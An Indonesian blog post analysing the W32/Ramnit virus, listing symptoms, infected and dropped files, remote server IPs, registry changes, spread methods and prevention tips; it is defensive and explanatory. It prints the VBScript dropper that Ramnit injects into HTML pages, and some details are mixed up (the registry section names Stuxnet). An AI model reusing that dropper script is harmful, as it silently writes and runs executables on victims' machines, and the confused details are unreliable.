Virus Ramnit definisi dan cara membasminya...

Virus Ramnit dengan varian teranyar yang memiliki kemampuan memanfaat celah LNK (Shortcut) sehingga mampu menyebarkan dengan membuat Shortcut.

Virus ini terdeteksi sebagai W32/Ramnit, hal yang perlu diwaspadai terhadap W32/Ramnit yaitu karena malware ini termasuk kelompok virus yang melakukan infeksi file. Hal ini yang menjadikan kita merasa kesulian dalam membersihkan virus ini karna ia menginfeksi terutama file .exe (application). Tidak hanya file .exe ,tetapi juga melakukan infeksi terhadap file web (HTML) dan file DLL (dynamic load library).

Dan lebih buruknya lagi, jika terhubung ke internet, ramnit akan menghubungi remote server (IRC server) dan melakukan koneksi ke beberapa alamat server zombie untuk mendownload malware lainnya (virus, trojan, spyware). W32/Ramnit juga menggunakan iklan dan popup dengan konten pornografi dan perjudian (casino) maupun iklan komersial lain. Walaupun tidak semua varian ketiga W32/Ramnit menggunakan celah keamanan LNK (shortcut), tetapi hampir semua varian W32/Ramnit akan sangat sulit dibersihkan.

Beberapa gejala  virus Ramnit yaitu :
1.Muncul pop-up iklan atau pop-up dengan konten pornografi/perjudian/ Dalam beberapa waktu tertentu, browser akan membuka pop-up iklan atau pop-up yang berisi konten pornografi atau perjudian (casino). Hal ini yang terkadang membuat pengguna komputer menjadi tidak nyaman.

2.Setelah pop-up iklan yang muncul, akan muncul pop-up error atau script error dari browser. Muncul-nya script error ini mirip seperti virus "ARP Spoofing" pada tahun 2008

3.Menginfeksi fiel .exe dan . DLL. File exe dan dll yang di-infeksi bertambah sekitar antara 100 - 120 kb, tergantung varian Ramnit yang menginfeksi. Meskipun begitu, tidak semua file exe dan dll yang di-infeksi.

4.Melakukan injeksi file html. Injeksi dilakukan dengan menambahkan pada header dan footer. Pada header, W32/Ramnit menambahkan script :
DropFileName = "svchost.exe

Sedangkan pada footer, W32/Ramnit menambahkan script :

Set FSO = CreateObject ("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & '\" DropFileName
If FSO.FileExists(DropPath)=False Then
Set fileobj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step2
Fileobj.write chr (CLng("&H" & Mid(WriteData, i,2)))
Next
Fileobj.close
End If
Set WSHshell = CreateObject ("Wscript.shell")
WSHshell.Run DropPath, 0

5.Membuat fungsi servise Windows menjadi blank. Dengan cara melakukan injeksi file pada file IEXPLORE.EXE dan file services.exe, serta menambahkan script pada file web (htm/html) membuat fungsi dari services Windows menjadi blank.

Membuat komputer hang / lemot bahkan membuat koneksi jadi terputus. File sistem Windows yang akan menjadi sasaran injeksi W32/Ramnit yaitu :
C:\WINDOWS\system32\svchost.exe (file sistem yang berhubungan dengan koneksi jaringan, dengan menginjeksi akan membuat jaringan terputus)
C:\WINDOWS\system32\lsass.exe (file sistem yang berhubungan dengan aktifitas komputer, dengan menginjeksi akan membuat komputer hang/lambat).
C:\WINDOWS\system32\services.exe (file sistem yang berhubungan dengan services dan driver yang berjalan)
C:\Program Files\Internet Explorer\IEXPLORE.EXE (file executable dari browser internet explorer)
6. Malware W32/Ramnit mencoba melakukan koneksi ke Remote Server menggunakan Internet Explorer yang telah di injeksi. Hal ini bisa kita lihat pada proses task manager, walaupun kita tidak sedang membuka IE / Internet Explorer 

7.    Malware W32/Ramnit melakukan koneksi ke Remote Server untuk melakukan pengiriman informasi yang dibutuhkan pada Remote Server. Remote Server yang digunakan yaitu diantara-nya :
195.2.252.247
195.2.252.252
69.50.193.157
74.125.227.17
74.125.227.18
74.125.227.20
95.211.127.69
 8. Selain mencoba melakukan koneksi dan ber-komunikasi dengan remote server, W32/Ramnit juga mencoba melakukan transfer data dari komputer korban ke Remote Server dan sebaliknya mengirim file malware ke dalam komputer korban.

9. W32/Ramnit melakukan broadcast pada jaringan. Di alamat ADX.ADNXS.COM

File virus W32/Ramnit

Malware W32/Ramnit dibuat menggunakan bahasa pemrograman C yang di kompress menggunakan UPX. File malware memiliki ciri sebagai berikut :

    * Berukuran 105 kb
    *Type file "Application'
    *Menggunakan icon "folder music"
    *Extension "exe"
Saat W32/Ramnit dijalankan, maka akan menginjeksi beberapa file sistem Windows yaitu :

    *C:\WINDOWS\system32\lsass.exe
    * C:\WINDOWS\system32\svchost.exe
    *C:\WINDOWS\system32\services.exe
    *C:\Program Files\Internet Explorer\IEXPLORE.EXE
Jika terkoneksi ke internet, W32/Ramnit akan mendownload beberapa file dan folder malware sebagai berikut :

    *C:\Documents and Settings\%user%\Local Settings\Temp\[angka].tmp
    *C:\Documents and Settings\%user%\Local Settings\Temp\explorer.dat
    *C:\Documents and Settings\%user%\Local Settings\Temp\winlogon.dat
    *C:\Documents and Settings\%user%\Local Settings\Temp\[nama_acak].exe
    *C:\Documents and Settings\%user%\Start Menu\Programs\[nama_acak].exe
    *C:\Program Files\Intenet Explorer\complete.dat
    *C:\Program Files\Intenet Explorer\dmlconf.dat
    *C:\Program Files\win\[angka_acak].exe
    *C:\Program Files\qwe
    *C:\WINDOWS\[nama_acak].exe
    *C:\WINDOWS\System32\[nama_acak].dll
    *C:\WINDOWS\System32\[nama&angka_acak].dll
    *C:\WINDOWS\Temp\[angka].tmp
Selain itu, W32/Ramnit melakukan injeksi terhadap beberapa file berikut (jika ada) yaitu :

    *C:\contacts.html
    *C:\Inetpub\wwwroot\index.html
    *C:\Program Files\Common Files\designer\MSADDNDR.DLL
    *C:\Program Files\Common Files\designer\MSHTMPGD.DLL
    *C:\Program Files\Common Files\designer\MSHTMPGR.DLL
    *C:\Program Files\Common Files\System\ado\MDACReadme.htm
    *C:\Program Files\Common Files\System\Ole DB\MSDAIPP.DLL
    *C:\Program Files\MSN\MSNCoreFiles\OOBE\obelog.dll
    *C:\Program Files\MSN\MSNCoreFiles\OOBE\obemetal.dll
    *C:\Program Files\MSN\MSNCoreFiles\OOBE\obepopc.dll
    *C:\Program Files\MSN\MSNIA\custdial.dll
    *C:\Program Files\MSN\MSNIA\msniasvc.exe
    *C:\Program Files\MSN\MSNIA\prestp.exe
    *C:\Program Files\MSN\MsnInstaller\iasvcstb.dll
    *C:\Program Files\MSN\MsnInstaller\msdbxi.dll
    *C:\Program Files\MSN\MsnInstaller\msninst.dll
    *C:\Program Files\MSN\MsnInstaller\msninst.exe
    *C:\Program Files\MSN\MsnInstaller\msnsign.dll
    *C:\Program Files\NetMeeting\netmeet.htm
Selain itu pada removable disk/drive akan membuat beberapa file yaitu :

    *autorun.inf
    *Copy of Shortcut to (1).lnk
    *Copy of Shortcut to (2).lnk
    *Copy of Shortcut to (3).lnk
    *Copy of Shortcut to (4).lnk
    *RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak1].exe
    *RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak2].exe
    *RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak3].exe
    *RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak4].exe
    *RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak5].exe
    *RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak6].exe
    *RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak7].exe
    *RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak8].exe
    *RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak9].exe
    *RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak10].exe
    *RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak11].exe
    *RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak1].cpl
    *RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak2].cpl
    *RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak3].cpl
    *RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak4].cpl
    *RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak5].cpl
    *RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak6].cpl
    *RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak7].cpl
    *RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak8].cpl
    *RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak9].cpl
    *RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak10].cpl
    *RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak11].cpl
    *RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak1].exe
    *RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak2].exe
    *RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak3].exe
    *RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak4].exe
    *RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak5].exe
    *RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak6].exe
    *RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak7].exe
    *RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak1].cpl
    *RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak2].cpl
    *RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak3].cpl
    *RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak4].cpl
    *RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak5].cpl
    *RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak6].cpl
    *RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak7].cpl

Serta pada jaringan yang menggunakan mapping drive, berusaha menginjeksi beberapa file yang memiliki nama berikut :

    *Blank.htm
    *Citrus Punch.htm
    * Clear Day.htm
    *Fiesta.htm
    *Ivy.htm
    *Leaves.htm
    *Maize.htm
    *Nature.htm
    *Network Blitz.htm
    *Pie Charts.htm
    *Sunflower.htm
    *Sweets.htm
    *Technical.htm

Modifikasi Registry
Beberapa modifikasi registry yang dilakukan oleh worm Stuxnet antara lain sebagai berikut :

   * Menambah Registry
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
[nama_acak] = C:\Documents and Settings\%user%\Local Settings\Temp\[nama_acak].exe
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_60DFFE60
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_60DFFE60\0000
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_60DFFE60\0000\Control
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_60DFFE60
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_60DFFE60\0000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_60DFFE60\0000\Control
HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main\featurecontrol
HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main\featurecontrol\FEATURE_BROWSER_EMULATION
HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\international

    * Menghapus Registry
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRes tore]
DisableSR = 0x00000001
    *  Merubah Registry
[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
CurrentLevel =
1601 =

Metode Penyebaran
Beberapa cara W32/Ramnit melakukan penyebaran yaitu sebagai berikut :
    *Drive by download (exploit)
 W32/Ramnit awalnya menyebar dengan memanfaatkan fitur drive by download pada system Windows. Dengan link-link yang tersebar pada forum atau e-mail, berusaha mengelabui user untuk menjalankan link tersebut. Selain itu juga saat akses pada website-website yang menyediakan konten atau plugin browser untuk di-download.
    * Removable drive/disk
Metode ini adalah metode yang umum dilakukan oleh para pengguna komputer. W32/Ramnit membuat banyak file agar menginfeksi komputer, serta ikut pula memanfaatkan celah keamanan LNK (shortcut).


* Jaringan
      W32/Ramnit berusaha melakukan injeksi terhadap beberapa file web (htm) tertentu di jaringan pada komputer yang melakukan mapping drive. Berikut file-file tersebut :
          o  Blank.htm
          o Citrus Punch.htm
          oClear Day.htm
          oFiesta.htm
          oIvy.htm
          oLeaves.htm
          oMaize.htm
          oNature.htm
          oNetwork Blitz.htm
          oPie Charts.htm
          oSunflower.htm
          oSweets.htm
          oTechnical.htm

Tips Pencegahan dari Malware W32/Ramnit

   1. Aktifkan Windows Firewall atau gunakan software firewall yang lain. Hal ini untuk mencegah dari akses yang tidak di-inginkan
   2. Pastikan komputer sudah mendapatkan update terbaru dari system Windows. Untuk mempermudah gunakan update otomatis dari system seperti "Automatic Updates". Atau bisa juga dengan men-download patch terbaru dari website Microsoft.
   3. Gunakan antivirus yang selalu terupdate dengan baik. Hal ini untuk mempermudah terhadap varian-varian dari malware yang baru.
   4. Batasi akses terhadap akses administrator. Bagi pengguna Windows 7 dan Vista, pastikan UAC (user account control) telah berjalan dengan baik.
   5. Berhati-hati saat membuka file attachment e-mail atau saat menerima transfer file dari orang yang tidak dikenal. Pastikan selalu di scan dengan antivirus yang terupdate.
   6. Berhati-hati terhadap program crack/keygen atau program-program yang tidak dikenal. Karena bisa saja sudah terinfeksi atau mengandung malware.
   7. Gunakan password yang tidak mudah dibaca dan diketahui. Pastikan selalu rubah password pada waktu-tertentu, dan bedakan password satu dengan lain-nya.
   8. Matikan fitur "autoplay" Windows untuk mencegah program yang tidak diinginkan pada removable drive/disk berjalan secara otomatis
   9. Matikan file sharing jika tidak digunakan. Jika memang menggunakan file sharing hanya berstatus read-only, atau konfigurasi sharing hanya untuk user-user tertentu.
Berhati-hati saat mengakses sebuah website atau forum yang menyediakan link-link tertentu untuk di-download atau di-install
Cara membersihkan di install linux lalu di bersihkan....atau pake tool Dr.WebCureIt tools! bisa di download Di sini


semoga berguna.....

No comments:

Post a Comment